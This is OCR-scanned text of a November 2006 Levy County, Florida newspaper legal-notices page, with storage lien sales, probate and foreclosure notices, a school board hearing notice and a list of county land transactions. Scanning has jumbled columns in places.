of: Nancy Bell, Chair ;UIT LEVY COUNTY, FLORIDi A Pub. Nov. 9,16, 23, 30, 2 -CA- LOR 'NOTIP cf^ja L S Ft Paul Barcia, d/b/a L&L Stor 292S pursuant to the provisions o 1107 Florida Self Storage facility RTY. (Fla. Stat. 83.801, et sec.), h IN by gives notice of sale u said Act, to wit: On Nover 24, 2006, at L&L Storage, DE- N.E. 200th Avenue, Willi, Florida, Paul Barcia or his a will conduct a sale at 9:00 Al sealed bids to the highest bi Bids to be opened by Noon viewing from 9:00 AM until NI for the contents of the sto bay or bays rented by the fo and ing person/persons: IN- Bernita Appling 4171 NE 103rd Ct. OTI- Williston, FL 32696 )rfei- Villis- Garrett Brown ston, 4906 SW Second Ave. you Cape Coral, FL 33914 Dy of ding Mark Clayton Y E. 10471 NE 75th St OM- Bronson, FL 32621 Box I file Jack Haubert ding 2747 SW 17th Cir f the Ocala, FL 34474 fore Beth Matus 3190 NE 192nd Ave. SO, Williston, FL 32696 tak- f de- Marvin Ragland 1870 NE 32nd St., #3 Silver Springs, FL 34488 offi- vem- Chris Rounds '14038 NE 50th PL Williston, FL 32696 Perry Smith 3034 G. Street Lorain, OH 44052 Consists of household, perse or miscellaneous items, st at L&L Storage, 2990 N.E. 2 Avenue, Williston, Florida. is being made to satisfy a s tory lien. Dated November 9, 2006 ro OF L&L Storage S 2990 N.E. 200th Avenue NTS Williston, Florida 32696 (352) 528-6179 (the rides Sale Date: November 24, 2( action Pub: Nov. 9, 16, 2006 the IN THE CIRCUIT COURT OF the THE ding EIGHTH JUDICIAL CIRCUIT s for IN AND FOR LEVY COUNTY, ntial FLORIDA ices PROBATE CASE NO: 2006-CP- ices 254 Year IN RE: THE ESTATE OF BER- 007. NICE P. REBELLO, a/k/a BER- the NICE A. REBELLO acting Deceased. d of ents NOTICE TO CREDITORS 632, The administration of the es- ublic tate of Bernice P. Rebello, a/k/a a.m. Bernice A. Rebello, deceased, the whose date of death was June 6 S. 26, 2006, is pending in the Cir- )rida cuit Court for Levy County, Flor- will ida Probate Division, File Num- and ber 2006-CP-254; the address option of which is P.O. Box 610, Bron- real son, Florida 32621. The names levy. and addresses of the personal form representative and the personal ains representative's attorney are set real forth below. are All creditors of the decedent unty and other persons having claims reet, or demands against the dece- sted dent's estate, on whom a copy I- of this notice is required to be rson served must file their claims with sion this court WITHIN THE LATER pect OF 3 MONTHS AFTER THE the TIME OF THE FIRST PUBLICA- ution TION OF THIS NOTICE OR 30 nced DAYS AFTER THE DATE OF the SERVICE OF A COPY OF THIS and NOTICE ON THEM. rson All other creditors of the de- at a cedent and other persons hav- ublic ing claims or demands against cord decedent's estate must file their and claims with this court WITHIN al is 3 MONTHS AFTER THE DATE with OF THE FIRST PUBLICATION cities OF THIS NOTICE. ecial ALL CLAIMS NOT SO FILED reter WITHIN THE TIME PERIODS ding SET FORTH IN SECTION ty at 733.702 OF THE FLORIDA or to PROBATE CODE WILL BE FOREVER BARRED. NOTWITHSTANDING THE of TIME PERIODS SET FORTH ABOVE, ANY CLAIM FILED TWO (2) YEARS OR MORE AF- TER THE DECEDENT'S DATE OF DEATH IS BARRED. A The date of the first publica- S tion of this Notice is November 006 9, 2006. Personal Representative:, .E Russell,SQttSebello .>lAr. n rage, POox3091 .:. f the Dunnellon, FL 34430-3091 SAct iere- Attorney for Personal Represen- nder tative: nber 'Thomas M. VanNess, Jr., Esq. 2990 Florida Bar No. 0857750 ston, VanNess & VanNess, PA. gent 1205 North Meeting Tree Blvd. M by Crystal River, FL 34429 dder. 1-352-795-1444 with Pub: Nov. 9, 16, 2006 loon -- rage NOTICE OF PUBLIC SALE llow- Todd Hubbard d/b/a Kips Mini-Storage, pursuant to the provision of the FI. Self Storage Facility Act (Fla. Stat.83.801 et sec.) hereby gives Notice of Sale under said act to wit: On Dec. 8,:00 a. m. for the content of the follow- ing person/ persons: Melissa Nutter1 P. O. Box 290 Chiefland, FL. 32644 Marline Jenkins P. O. Box 723 Chiefland,FL. 32644 James Morris 285 S. E. 911 St. Old Town, FL. 32680 Thomas Alderman Jr. 5650 N.W. 30 St. p Chiefland, FL. 32626 Tonya Akins 9809 S,W. 51 Ave. onalr Trenton, FL. 32693 :ored 00th Consists of household, per- Sale sonal items or miscellaneous tatu- merchandise, stored at Kips Mini-Storage, 13645 N.W Hwy#19 Chiefland, FL.. Sale is being made to satisfy statutory lien. Todd Hubbard Kips Mini-Storage 13645 N.W. Hwy#19 Chiefland, Fl. 32626 1-352-490-9591 Pub: Nov.16, 23, 2006 IN THE CIRCUIT COURT IN AND FOR LEVY COUNTY, FLORIDA CASE NO. 2006-CA-675 EMC MORTGAGE CORPORATION Plaintiff, vs. SHARON SMOKLY STANCIL F/K/A SHARON A. SMOKLY, UNKNOWN TENANT 1, 4m day of December, 2006, at 11:00 o'clock A.M. at the Lobby of the Levy County Courthouse in Bronson, Florida on Mondays, offer for sale and sell at public outcry to the highest and best bidder for cash, the following described property situate in Levy County, Florida: Lot 1, Block 14, WILLISTON HIGHLANDS UNIT 5 REPLAT, according to the Plat thereof, recorded in Plat Book 4, Page 5, of the Public Records of Levy County, Florida. Together with 1994 DWMH SHAD 24x48 mobile home VIN# 146M8362A & VIN# 146M8362B pursuant to the final Judgment entered in a case pending in said Court, the style of which is indicated above. Any person or entity claiming an interest in the surplus, if any, resulting from the foreclosure sale, other than the property owner as of the date of this Lis Pendens, must file a claim on same with the Clerk of Court within 60 days after the foreclosure sale. WITNESS my hand an official seal of said Court this 6th day of November, 2006. In :accordance with the AmericanSr With, Disabilities Act, persons with disabilities needing a special accommodation to participate in this proceeding should contact Court Administration at 355 South Court Street, Bronson, Florida, Telephone (352) 486-5100, not later than seven (7) days prior to the proceeding. If hearing impaired, (TDD) 1/800/955-8771, or Voice (V) 1/800/955-8770, via Florida Relay Services. Danny J. Shipp CLERK OF THE CIRCUIT CO URT By: Gwen McElroy Deputy Clerk (COURT SEAL) ATTORNEY FOR PLAINTIFF Frank Albert Reder Butler & Hosch, P.A. 3185 S. Conway Rd., Ste. E Orlando, Florida 32812 (407) 381-5200 Pub: Nov. 16, 23, 2006 IN THE CIRCUIT COURT FOR LEVY COUNTY, FLORIDA PROBATE DIVISION File No. 2006-CP-000210 IN RE: ESTATE OF JAMES T. VANDERGRIFF A/k/a JAMES THEDORE VANDERGRIFF A/k/a JAMES THEODORE VANDERGRIFF A/k/a JAMES T. VANDERGRIFF, JR. A/ k/a JAMES THEODOR VANDERGRIFF Deceased. NOTICE TO CREDITORS The administration of the estate of JAMES T. VANDERGRIFF, deceased, whose date of death was July 10, 2006, is pending in the Circuit Court for LEVY County, Florida, Probate .Division, the address of which is 355 South Court St., (P.O. Drawer 610) Bronson, FL 32621. The names and addresses of the personal representative and the personal representative's attorney are set forth below. All creditors of the decedent and other persons having claims ordemandsagainst decedent's estate must file their claims with this court WITHIN 3 MONTHS AFTER THE DATE OF THE FIRST PUBLICATION OFTHIS NOTICE. ALL CLAIMS NOT FILED WITHIN THE TIME PERIODS SET FOTHv. 16, 2006. Personal Representative MARTIN J. STILES 9140 W. Chata Place Crystal River, FL 34428 Attorney for Personal Representative: GLEN C. ABBOT Florida Bar No. 235911 P.O. Box 2019 Crystal River, Florida, 34423- 2019 Telephone: (352) 795-5699 Pub: Nov. 16, 23, 2006 PUBLIC NOTICE The School Board of Levy County will hold a Public Hearing at its office, 480 Marshburn Drive, Bronson, Florida, on Tuesday, December 19, 2006, at 9:30 a.m. to adopt/amend the following School Board Policies: 3.16 Charter Schools 4.18 Transfer Credits 4.25 Disposing of Surplus, Obsolete, and Unusable Textbooks and Instructional Materials 5.15 Administration of Medication During School Hours 6.20* Sick Leave 11.03* Use of Facilities: Nov. 16, 2006 Buying Tax Deeds? JVeed to ee&= tfAe ti&&e? &xpemienceda, ependa&te Sewice and Reasonable Rates! eafe efutva ote J. Weidne' ATTORNEY AT LAW (352) 486-3753 Page 17 Legal deadline is 5 p.m. Monday Page 18 LEVY COUNTY JOURNAL AROUND THE COURTHOUSE THURSDAY, NOVEMBER 16, 2006 Levy Land Transactions 10/21/06 10/30/06 Transaction Code: AAA-Agree Additional Advances, A-Assignment, AAD Assign Agree Deed, ACT-Amended Certificate of Title, AD-Agree Deed, A Assumption of Indebtedness, AM -Assignment of Mortgage, CD-Correctoi SDeed, CT-Certificate of Title, D-Deed, E-Easement, FJDX-Final Judgmer Divorce X, MMA-Mortgage Modify Agreement, NL-Notice of Limitation, P Probate X, QCD-Quit Claim Deed, TD-Tax Deed, TBRD-Timber Deed, WD Warranty Deed QCD, $10.00, L30(9) WILLISTON HGH G&CC ESTS Grantee(s): (s) LATALL ALLEN, LATALL MARTHA Grantor(s): LATALL MARTHA M, $6,000,000.00, BDY 29, 31, 32-13-19, ETC Grantee(s): TRUST FINANCIAL LLC Grantor(s): D&M LEVY LC, HODGE BROTHERS LLP, HODGE EDWARI CHARLES SR, HSI LEVY LC, VH LEVY LC WD, $350,000.00, BDY ADJACENT TO L10-11 BETWEEN (2-3) OF (2 THE REPLAT OF CORONET PARK SD, WIMH, ETC Grantee(s): (s) RONNIE F TAYLOR REVOCABLE TRUST, TAYLOR BAF BARA D TRUSTEE, TAYLOR RONNIE F TRUSTEE Grantor(s): LANG BETTY B, LANG HUNTER C WD, $175,000.00, BDY L1-3, 16-18(3) REPLAT OF CORONET PARK Grantee(s): (s) RONNIE F TAYLOR REVOCABLE TRUST, TAYLOR BAF BARA D TRUSTEE, TAYLOR RONNIE F TRUSTEE Grantor(s): LANG BETTY B, LANG HUNTER C M, $430,749.65, BDY L1-3, 16-18(3) REPLAT OF CORONET PARK ETC Grantee(s): DRUMMOND COMMUNITY BANK Grantor(s): RONNIE F TAYLOR REVOCABLE TRUST, TAYLOR BARBAR D TRUSTEE, TAYLOR RONNIE F TRUSTEE WD, $10.00, BDYNE SEI/436-12-17, PARCEL #03601-015-00 Grantee(s): JLK2 LLC Grantor(s): KLINGENSMITH JEANETTE, KLINGENSMITH JEFF CD, $10.00, UNIT C4 CEDAR COVE EFFICIENCY CONDO II, ETC Grantee(s): BROWN JANICE, VONASEK JOHN Grantor(s): BROWN JANICE TRUSTEE, VONASEK BROWN TRUS1 VONASEK JOHN TRUSTEE CD, $10.00, UNIT C4 CEDAR COVE EFFICIENCY CONDO II, ET( Grantee(s): LEXI GROUP LLC Grantor(s): BROWN JANICE, VONASEK JOHN WD, $10.00, L16(B) LANGLEYESTS Grantee(s): JLK2 LLC Grantor(s): KLINGENSMITH JEFF, KLINGENSMITH JEANETTE WD, $90,000.00, L22 ALLEN WADE SD Grantee(s): HOLLAND RACHEL, HOLLAND DENNIS Grantor(s): MCCARTHY BRENDON J M, $72,000.00, L22 ALLEN WADE SD Grantee(s): MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC FIRST BANK, FIRST BANK MORTGAGE, MERS Grantor(s): HOLLAND RACHEL, HOLLAND DENNIS M, $10,000.00, L22 ALLEN WADE SD Grantee(s): MCCARTHY BRENDON J Grantor(s): HOLLAND RACHEL, HOLLAND DENNIS M, $27,177.74, BDYE1/2 SHIN 29-14-16, ETC Grantee(s): DRUMMOND COMMUNITY BANK Grantor(s): GORE JERRY J M, $130,150.00, L9(37) UNIVERSITY OAKS Grantee(s): UMC MORTGAGE COMPANY, UNITED MORTGAGE CORP Grantor(s): GILBERT RODONIA, GILBERT JEFFREY ' WD, $50,000.00, L3 GRACELANDSHORES SEC G, W/MH Grantee(s): BAIR LESLIE, BAIR ROBERT Grantor(s): COLEY CARL, COLEY CHERYL A, RAY CHERYL A, MAGIN/ CHERYLA QCD, $2,000.00, UNIT WEEK #38 IN UNIT 9308 CEDAR COVE PHASE ICONDO Grantee(s): RENFROE BEVERLY Grantor(s): LAVERY LINDA P M, $90,000.00, L81(93) WILLISTON HGH G&CC ESTS Grantee(s): GTE FEDERAL CREDIT UNION Grantor(s): TYLER BARBARA L, TYLER SHAWN I M, $5,000.00, L81(93) WILLISTON HGH G&CC ESTS Grantee(s): GTE FEDERAL CREDIT UNION Grantor(s) TYLER BARBARA L, TYLER SHAWN, I ,, . M, $55,000.00, BDYNE1/4 NE1/430-13-19, PARCEL #05235-002-00 Grantee(s): BANK OF AMERICA NA Grantor(s): CARRILLO LESTER A M, $50,000.00, L7-8(18) WILLISTON HGH#7 Grantee(s): BANK OF AMERICA NA . Grantor(s): CYCAN LINDA MACKEY, CYCAN THOMAS, MACKEY CYCAN LINDA M, $308,250.00, L7-8(8), L1-2(16), (13) MAP OF RALEIGH, ETC Grantee(s): CAPITAL CITY BANK Grantor(s): WALKER ROBERTA WD, $50,000.00, L40(C) GRACELAND SHORES Grantee(s): RUSS ASHLEY R JR Grantor(s): OSBORNE BRIAN DOUGLAS, OSBORNE DAVID JOHN,.OS BORNE GEORGE W WD, $120,000.00, L10(E) REPLAT OF PORTION OF CEDAR KEY M/I VILLAGE Grantee(s): LANG BETTY B, LANG HUNTER C Grantor(s): DYE DEBRA LYON, DYE DANNY QCD, $10.00, L9(27) WILLISTON HGH #14 Grantee(s): STRICKLAND CHARLES D, KOON ROCHELLE L Grantor(s): KOON ROCHELLE L M, $177,117.00, NO LEGAL DESC ATTACHED Grantee(s): TAYLOR BEAN & WHITAKER MORTGAGE CORP, MERS MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): TILSON NANCY, TILSON JAMES WD, $107,000.00, L6-9(11) UNIVERSITY OAKS, W/MH Grantee(s): PIAIIA JACINATE V, PIAIIA VINCENT JAMES Grantor(s): FREEMAN CHRISTOPHER R, FREEMAN DOUGLAS K WD, $19,500.00, L5(138) WILLISTON HGH G&CC ESTS Grantee(s): RAMIREZ GUSTAVO, PAOLINICARLOS Grantor(s): FULGHUM DANIEL WD, $17,000.00, BDYNE1/4 SW1/429-11-17, PARCEL #03233-033-00 Grantee(s): REID MARNELLE V Grantor(s): RAKITIN ALAN, GREENSPAN PERRY H, PERRY H GREENS- PAN INC CT, $100.00, 38-06-CA-362, L14(7) UNIVERSITY OAKS Grantee(s); ALLEN ELAINE C Grantor(s): ASH KENNETH A, ASH NANCY P, CLERK OF COURT DANNY J SHIPP WD, $255,168.00, L121, 124TIGER ISLAND,BDY 34, 35-13-13, ETC Grantee(s): JENNINGS GROVER C, JENNINGS REGINA M Grantor(s): NELSON BETTY) WD, $10.00, L1FANNING SPRINGS WOODED ESTS, W/MH Grantee(s): CRANE CATHI E ABBISS, ABBISS CAROLEE Grantor(s): ABBISS CAROLEE TRUSTEE WD, $22,500.00, L9-10(17) OLD CHIEFLAND Grantee(s): BALLENGEE JAMES GORDON Grantor(s): ROWE EUGENIA S TRUSTEE, ROWE GENE A TRUSTEE, ROWE TRUST ;M, $17,500.00, L9-10(17) OLD CHIEFLAND Grantee(s): ROWE TRUST Grantor(s): BALLENGEE JAMES GORDON M, $44,000.00, L71 SPANISH TRACE SD Grantee(s): FLORIDA CREDIT UNION Grantor(s): WAIN JOSEPH, WAIN TAME WD, $60,000.00, BDY L11(B) WOODLAND ACRES, W/MH Grantee(s): LEWMAN CASH Grantor(s): WELCH JULIE, WELCH WILLIAM A QCDM, $10.00, L14 QUAIL RUN Grantee(s): ZACCHEO EILEEN Grantor(s): ROBERTS CARMEN A QCD, $10.00, L14 QUAIL RUN Grantee(s): ZACCHEO EILEEN Grantor(s): ROBERTS NATHAN G M, $100,000.00, L36 LAZY OAKS, BDY 16, 21-12-18, ETC Grantee(s): DAVIS B E Grantor(s): BOYLE JOHN, BOYLE RUTH M, $92,000.00, L30-32(8) PEACEFULACRES SD Grantee(s): SAXON HOME MORTGAGE, SAXON MORTGAGE INC Grantor(s): ROWE TERM, ROWE JAMES M, $280,000.00, L61 WATERWAY ESTS #3 Grantee(s): CAMPUS USA CREDIT UNION Grantor(s):. BARKER NANCY T JAKAB, BARKER BILL E JR, JAKAB BARKER NANCY T CD, $10.00, OR 883/714, L2(C) RAYS SD #1 REVISED. Grantee(s): HOLLADAY DIANA, HOLLADAY PAUL DAVID Grantor(s): ROETMAN ENTERPRISES, ROETMAN EMMETT M, $33,000.00, L2(C) RAYS SD #1 REVISED Grantee(s): CAPITAL CITY BANK Grantor(s): HOLLADAY DIANA, HOLLADAY PAUL DAVID D- WD, $60,000.00, L16(9) CHIEFLAND COUNTRY ESTS I- Grantee(s): KRAMER DAVID r Grantor(s): TOVINE GINA LYNN, TOVINE WILLIAM E nt CD, $10.00, L8-10(1)REPLAT OF WILLISTON HGH #5, W/MH. X Grantee(s):) WEISENBACH DAVID F, WEISENBACH ONA, WEISENBACH -' PETER Grantor(s): WEISENBACH DAVID F WD, $10.00, L22(B) RIVERLAKE ESTS Grantee(s): MCCOLLUM BONNIE D, EUNICE KENNETH M Grantor(s):) MCCOLLUM ALLEN RAY, MCCOLLUM BONNIE DIANE AAA, $15,000.00, OR 965/157 Grantee(s): CAPITAL CITY BANK. D Grantor(s): CARDOUNEL MERCY, CARDOUNEL ANGEL A M, $25,000.00, L9-A BRONSON RANCHETTES, BDY 17-12-17, ETC 2) Grantee(s): CAPITAL CITY BANK Grantor(s): COLON MARIA V, COLON CESAR t- M, $35,000.00, L1 GREEN HILLS, W/MH Grantee(s): CAPITAL CITY BANK Grantor(s): HARDISONCHARLES T, HARDISON GWENDOLYN G WD, $95,000.00, L 12(3) LAKE JOHNSON ESTS #1, W/MH -Grantee(s): MONROE PHYLIS, MONROE CHARLES Grantor(s):) AUGUSTINUS ISABEL V, AUGUSTINUS DONALD R WD, $80,000.00, LAM-5, AM-6, AM-7(A & G) GLEASONS TRAILER VIL- , LARGE, W/MH Grantee(s): AUGUSTINUS DONALD, AUGUSTINUS ISABEL Grantor(s): BLISS VIRGIL B DECEASED, BLISS CAROL K A M, $31,000.00, L10 SPANISH TRACE ADD #1 Grantee(s): JAMES J LESTOCK REVOCABLE TRUST, LESTOCK JAMES J TRUSTEE Grantor(s): BOWMAN GERALD, BOWMAN SHARON WD, $60,000.00, L8(8) CHIEFLAND COUNTRY ESTS Grantee(s): SPY HOLDINGS LLC Grantor(s): GREENWOOD OF CHIEFLAND INC r, WD, $120,000.00, L5-6(14) CHIEFLAND COUNTRY ESTS Grantee(s): SY HOLDINGS LLC C Grantor(s): GREENWOOD OF CHIEFLAND INC QCD, $10.00, BDY 36-16-17, PARCEL #3930-000-00, ETC Grantee(s): WOLCOTT RICHARD L, WOLCOTT SANDRA Grantor(s): WOLCOTT SANDRA QCD, $10.00, L13 CASONS INGLIS ACRES #4 Grantee(s): STEVENS RONALD W Grantor(s): GILREATH JACQUELINE W, GILREATH JACQUELINE W TRUSTEE, WILLIAM A GILREATH REVOCABLE TRUST - QCD, $29,000.00, L13 CASONS INGLIS ACRES #4 Grantee(s): FAMILY HOME CENTER OF HOMOSASSA LLC SGrantor(s): STEVENS RONALD W QCD, $10.00, L37WITHLAOOOCHEE RIVER PARK ESTS Grantee(s): MARTIN TED Grantor(s): DRAKE WAYNE WD, $65,000.00, L1,3(26) 4TH ADD TO BRONSON HTS SD, W/MH Grantee(s): GERTNER CATHERINE, MCDOWELL ELSIE C Grantor(s): HUTSON WILMA, HUTSON ROSCOE B M, $52,000.00, L1,3(26) 4TH ADD TO BRONSON HTS SD, W/MH Grantee(s): CAPITAL CITY BANK Grantor(s): GERTNER CATHERINE G, MCDOWELL ELSIE C M, $102,000.00, BDY NW 1/4 NW1/4 17-12-17 Grantee(s): AMERICAN GENERAL HOME EQUITY INC Grantor(s): UNDERWOOD M JANN, UNDERWOOD STANLEY R WD, $10.00, L3ANNEX HTS SD A Grantee(s): ERVIN LISAA, BEACH LISAA Grantor(s): BEACH MICHAEL T S M, $80,000.00, L3 ANNEX HTS SD Grantee(s): BRANCH BANKING AND TRUST COMPANY, MERS, MORT- GAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): BEACH LISAA, ERVIN JAMES STEVEN, ERVIN LISA 3 WD, $10,000.00, BDY NW 1/4 NW1/4 21-16-16, W/MH, PARCEL#02898- 004-00 Grantee(s): MERCHANT CONNIE M, MERCHANT RONNIE V rGrantor(s): BURKARTROBERT H JR W7$I15,930.88s j~"oW-'~137, PARCEL #03633-000-06, "'Ef- Grantee(s): HOUSEHOLD FINANCE CORPORATION III Grantor(s): MARUCA CAROLE, MARUCA CAROLE L, MARUCA DOMI- NIC, MARUCA DOMINIC L E, $10.00, L12-13 SHAMROCK ACRES #1, BDY 25-14-17, PARCEL #03743-006-OG Grantee(s): PROGRESS ENERGY Grantor(s): LIVING WATER LIFE CENTER INC M, $50,000.00, BDY SEI/410-15-17, PARCEL #03778-008-OA Grantee(s): BANK OF AMERICA NA Grantor(s): RICHARDSON GIOVANNA D, RICHARDSON WILLIAM R WD, $130,000.00, BDY SE1/4 SW1/432-11-15, PARCEL #01680-002-00, ETC Grantee(s): SMITH ALESHAA, SMITH MELVIN D Grantor(s): E & K INVESTMENTS LLC M, $130,000.00, BDY SE1/4 SW1/4 32-11-15, ETC Grantee(s): TAYLOR BEAN & WHITAKER MORTGAGE CORP, MERS,MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): SMITH ALESHAA, SMITH MELVIN D QCD, $100.00, L30 LIBBY HTS Grantee(s): STEVE SMITH CONSTRUCTION INC Grantor(s): BAKER THOMAS J QCD, $10.00, BDY NE1/4 NW 1/4 26-11-17, PARCEL #03223-027-00, ETC - Grantee(s): CRUMAN FAMILY LIMITED PARTNERSHIP Grantor(s): CRUZ ARMANDO WD, $21,000.00, L18(42) OAK RIDGE ESTS, W/MH Grantee(s): GREEN TREE SERVICING LLC Grantor(s): BREMER HAROLD L, BREMER DAWN M WD, $6,500.00, L14 HIDEAWAY #1 Grantee(s): RUSH RICHARD L Grantor(s): LITTERAL LENORA J, LITTERAL LESTER WD, $30,000.00, L6(4) OAK KNOLL ESTATES Grantee(s): CERCY LINDA M, CERCY CHARLES R Grantor(s): KAHN BURT, KAHN BURT L, KAHN GLENDA R DECEASED S WD, $32,500.00, L6(4) OAK KNOLL ESTS, W/MH Grantee(s): J 0 T LLC Grantor(s): CERCY LINDA M,CERCY CHARLES R M, $125,000.00, BDYNW 1/4 SE1/421-12-17 & L 1(16) BRONSON HTS SD, ETC Grantee(s): JARRETT MILEY M, JARRETT HUGH H JR Grantor(s): MIILICH JAY M, $83,125.28 NO LEGAL DESC GIVEN, PARCEL #09832-000-00 Grantee(s): U S BANK NA Grantor(s): WHITE SHANNON I WD, $45,000.00, LOT 2-4, 3-6, 4-2, 4-3,.4-4, 4-5, 4-6, 4-7, 4-8, 4-9, 4- 10(K) MANATEE FARMS ESTS #2, SEE IMAGE Grantee(s): ORENCHAK LINDA R, ORENCHAK JERRY A Grantor(s): ALMDALE JO ANNE, ALMDALE EARL WILLIAM QCD, $1.0.00, L4(K) MANATEE FARMS ESTATES #2, ETC Grantee(s): ORENCHAK LINDA R, ORENCHAK JERRY A Grantor(s): ALMDALE JO ANNE, ALMDALE EARL WILLIAM WD, $120,000.00, L1(D) REPLAT OF A PORTION OF CEDAR KEY MO- BILE HOME VILLAGE Grantee(s): THOMAS NATALIE J, CRANDLEY WILLIAM R Grantor(s): CAMPBELL MARY S, CAMPBELL PHILLIP A QCD, $10.00, L KING RANCH OF FLORIDA RANCHETTES 1ST ADD Grantee(s): SLAUGHTER RE-NE V, SLAUGHTER LYNN E Grantor(s): DEEGAN BRIAN PATRICK WD, $10.00, BDY 7-14-19, PARCEL #05320-000-00 Grantee(s): LEGLER RICHARD D Grantor(s): WISE JEAN, WISE HAROLD L, WISE JEANNE QCD, $10.00, BDY 32-13-18, PARCEL #04505-019-00 Grantee(s): CATLIN MICHELLE YVETTE, CATLIN JANELL NICOLE Grantor(s): CATLIN ETHEL L WD, $160,000.00, L3-6 WILLISTON SAVANNAH PHASE Grantee(s): PARK PLACE ESTATES LLC Grantor(s): JCM SMM RENTAL, MCMILLEN ENTERPRISES WD, $425,000.00, BDY SE1/4 SE1/44-13-19, PARCEL #04956-001-00 Grantee(s): KIRBY LAURENCE, KIRBY MICHAEL O Grantor(s): OCONNOR LAURA, OCONNOR ERNEST G M, $340,000.00, BDY SEI/4 SE1/44-13-19, PARCEL #04956-001-00 Grantee(s): BANK OF AMERICA NA Grantor(s): KIRBY LAURENCE, KIRBY MICHAEL 0 M, $63,750.00, BDY SEI/4 SE1/44-13-19, PARCEL #04956-001-00 Grantee(s): BANK OF AMERICA NA Grantor(s): KIRBY LAURENCE, KIRBY MICHAEL 0 M, $25,000.00, BDY SEI/4 SW1/4 31-12-19 & L7,12, BDY L9-10(27) THE C.S. NOBLE SURVEY OF THE CITY OF WILLISTON,I A Grantee(s): PERKINS STATE BANK Grantor(s): GEIGER REBECCA S, GEIGER BRANTLEY C M, $32,100.00, L25(64) WILLISTON HGH G&CC ESTS Grantee(s): CAMPUS USA CREDIT UNION Grantor(s): ANDERSON CATHLEEN A, ANDERSON JAMES W JR WD, $43,000.00, L46(10) FANNING SPRINGS ANNEX, W/MH Grantee(s): COTHRON CARLA MANN, COTHRON PHILLIP D Grantor(s): FRISBY MARGARET R, FRISBY JOHN L WD, $12,900.00, L19(30) OAK RIDGE ESTS SD Grantee(s): AULET DALMA I, MIRANDA JUAN L Grantor(s): H B HAYNE CORP WD, $10.00, L3(75) REPLAT OF WILLISTON HGH #5, W/MH Grantee(s): COPELTON ANTOINETTE, COPELTON DAVID Grantor(s): COPELTON ANTOINETTE, COUCH LISA M, LARUSSO MA- RIA I AAA, $100,000.00, OR 724/551, 847/413, 896/818, 980/934, 980/938, 987/457, BDY 23, 26-13-18, ETC Grantee(s): COMMUNITY BANK & TRUST OF FLORIDA SGrantor(s): SHARP SARA PARKS, SHARP PAUL M WD, $125,000.00, L45 TOM KNOTTS, BDY 33-16-16, PARCEL #13577- 000-00 Grantee(s): STEINBAUM SHARI, STEINBAUM LEONARD Grantor(s): FLORIDA LAND OF DREAMS LLC M, $71,047.00, L2,4(35) CHIEFLAND, W/MH Grantee(s): AMERICAN GENERAL HOME EQUITY INC Grantor(s): SANDERS YOLANDA, SANDERS DONNELL WD, $39,995.00, L64(32) RAINBOW LAKES ESTS SEC N Grantee(s): QUINTERO ELVIRA, ZAMBRANO LUIS FERNANDO Grantor(s): AMERICAN PRIME LLC M, $33,995.75 L64(32) RAINBOW.LAKES.ESTS SEC N Grantee(s): AMERICAN PRIME LLC Grantor(s): QUINTERO ELVIRA, ZAMBRANO LUIS FERNANDO E, $1.00, L19(12) OAK RIDGE ESTS Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): TURBEVILLE DONNY L JR E, $1.00, L3(1) THE FARMS @ WILLISTON #1 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): SPARKS WANDA K, SPARKS CHARLES W JR E, $1.00, L9-10(12)SUWANNEE RIVER HGH Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): SWS PROPERTIES LLC E, $1.00, L5(A) LIBBY HTS MH COMM Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): CRIBBS PHILLIS E, CRIBBS TIMOTHY W E, $1.00, L5(1) CIRCLEK RANCH, ETC Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): BARKER INC, BARKER OSBORN E, $1.00, L4NORTHWOOD HTS Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): CSS PROPERTIES LLC, STEWART C SHAWN E, $1.00, L17-18(4) SHERWOOD FOREST Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): MCNEIL TANYA K, MCNEIL LARRY R E, $1.00, L14(1) TISHOMONGO PLANTATION SD Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): NIPPER FAITH R, NIPPER MERRELL I E, $1.00, L8-9(F) ELESTON ADD Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): DALLAS RUDOLPH E, $1.00, L 17 FIVE OAK ACRES SEC 1 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): STATES DOTTIE LOU, STATES OLIVER L, STATES OLIVER LEWIS WD, $10.00, L35(4) FANNING SPRINGS ANNEX Grantee(s): STRICKLAND DONNA L, STRICKLAND SELBY WAYNE Grantor(s): S WS PROPERTIES LLC M, $62,500.00, L35(4) FANNING SPRINGS ANNEX Grantee(s): MERS, MORTGAGE ELECTRONIC REGISTRATION SYS- TEMS INC, SUNTRUST MORTGAGE INC Grantor(s): (s) STRICKLAND DONNA L, STRICKLAND SELBY W E, $1.00, BDYNE1/4 SW1/429-11-17, PARCEL #03233-277-00 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): MURILLO VIDA LUCERO E, $1.00, L18-19(8) FANNING SPRINGS ANNEX Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): CORRELL PERRICONE GINNY, PERRICONE GINNY COR- RELL, PERRICONE ARTHUR L E, $1.00, BDY SE1/4 SW1/433-12-18, PARCEL #04253-003-00 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): PEREZ RAUL E, $1.00, L8(K) CEDAR KEY SHORES REPLAT Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): GEORGE JAMES A, GEORGE TERESAA E, $1.00, L8(C) GLENWOOD ESTS Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): KOONCE DEREK K E, $1.00, L2 HENRY TAYLOR ADD Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): MACMILLAN CATHERINE B, MACMILLAN MICHAEL E, $1.00, BDYNE1/4 SHIN 